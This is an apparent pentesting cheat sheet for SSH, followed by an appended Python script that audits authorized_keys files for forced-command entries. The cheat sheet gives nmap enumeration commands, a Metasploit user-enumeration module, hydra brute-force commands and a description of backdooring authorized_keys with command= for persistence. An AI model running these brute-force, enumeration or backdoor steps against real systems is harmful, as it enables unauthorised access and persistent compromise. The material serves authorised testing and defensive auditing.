SSH
Pentesting SSH - TCP Port 22
Theory
SSH (Secure Shell, also expanded as Secure Socket Shell) is a network protocol that gives users a secure way to access a computer over an unsecured network.
The SSH protocol operates by default on TCP port 22.
Practice
Enumerate SSH server
We can use nmap to enumerate information about the running SSH server:
# Run the default nmap scripts for SSH and retrieve the version
nmap -p22 <ip> -sC -sV
# Send all nmap ssh related scripts
nmap -p22 <ip> --script ssh-*
# Retrieve supported algorithms
nmap -p22 <ip> --script ssh2-enum-algos
# Retrieve the host keys in full, to check for weak keys
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full
# Check the authentication methods accepted for a user
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root"
Enumerate Users
Some versions of OpenSSH are vulnerable to a timing attack that enumerates valid users. The following Metasploit module exploits this:
msfconsole
msf> use auxiliary/scanner/ssh/ssh_enumusers
Brute-Force Credentials
Be aware that brute-forcing accounts may trigger account lockout.
# -t : Number of tasks
# -L/l : username list / username
# -P/p : password list / password
hydra -l username -P passwords.txt <target-ip> ssh -t 4
hydra -L usernames.txt -p password <target-ip> ssh -t 4
# -s : Specific port
hydra -l username -P passwords.txt -s 2222 <target-ip> ssh -t 4
hydra -l username -P passwords.txt ssh://<target-ip>:2222 -t 4
Crack SSH Private Key
Some private keys are protected by a password or passphrase, so we may attempt to brute-force the passphrase offline.
SSH Private Keys
Persistence
It is possible to backdoor an SSH public key entry (in authorized_keys) using the command= option: the forced command executes whenever the user logs in with that key.
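As an added, defender-side example that is not part of the original page, the script below audits an authorized_keys file for entries carrying the command= option described above. It parses the options field properly (quoted values may contain commas, spaces and escaped quotes), so an entry cannot hide its forced command behind tricky quoting; the function names are the example's own and the sample file and key blobs are constructed.

```python
from typing import Dict, List, Optional, Tuple

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")  # an entry starting with a key type has no options field

def split_options(line: str) -> Tuple[List[str], str]:
    """Split the options field on unquoted commas; it ends at the first unquoted space."""
    if line.startswith(KEY_TYPE_PREFIXES):
        return [], line
    opts, start, quoted, i = [], 0, False, 0
    while i < len(line):
        ch = line[i]
        if ch == '"':
            quoted = not quoted
        elif not quoted and ch in ", ":
            opts.append(line[start:i])
            start = i + 1
            if ch == " ":
                return opts, line[start:].lstrip()
        i += 2 if ch == "\\" and quoted else 1  # \" inside quotes escapes the quote
    return opts, ""  # no key material after the options: malformed entry

def forced_command(options: List[str]) -> Optional[str]:
    """Unquoted value of command=, or None when the entry forces no command."""
    for opt in options:
        if opt.startswith("command="):
            value = opt[len("command="):]
            value = value[1:-1] if value[:1] == value[-1:] == '"' else value
            return value.replace('\\"', '"')
    return None

def audit(contents: str) -> List[Dict[str, object]]:
    """One finding per entry with command=; restricted service keys use it legitimately, so review each."""
    findings = []
    for lineno, line in enumerate(map(str.strip, contents.splitlines()), 1):
        if not line or line.startswith("#"):
            continue
        opts, rest = split_options(line)
        fields = rest.split(None, 2) + [""]  # key type, base64 blob, comment (may be empty)
        if len(fields) < 3:
            continue  # malformed entry
        if (cmd := forced_command(opts)) is not None:
            findings.append({"line": lineno, "command": cmd, "comment": fields[2]})
    return findings

SAMPLE = "\n".join([  # constructed file; the blobs are not real keys
    "ssh-ed25519 AAAAC3Nza-EXAMPLE-BLOB1 alice@laptop",
    'command="/usr/local/bin/backup.sh",no-pty,from="10.0.0.5" ssh-rsa AAAAB3Nza-EXAMPLE-BLOB2 backup',
    'no-agent-forwarding,environment="X=a,b" ssh-rsa AAAAB3Nza-EXAMPLE-BLOB3 bob',
    r'command="/tmp/.cache/run \"arg\"" ssh-ed25519 AAAAC3Nza-EXAMPLE-BLOB4 alice@laptop',
])
```

A forced-command entry whose comment matches a user's ordinary key (the last sample line) is the kind of finding worth comparing against the owner's known keys.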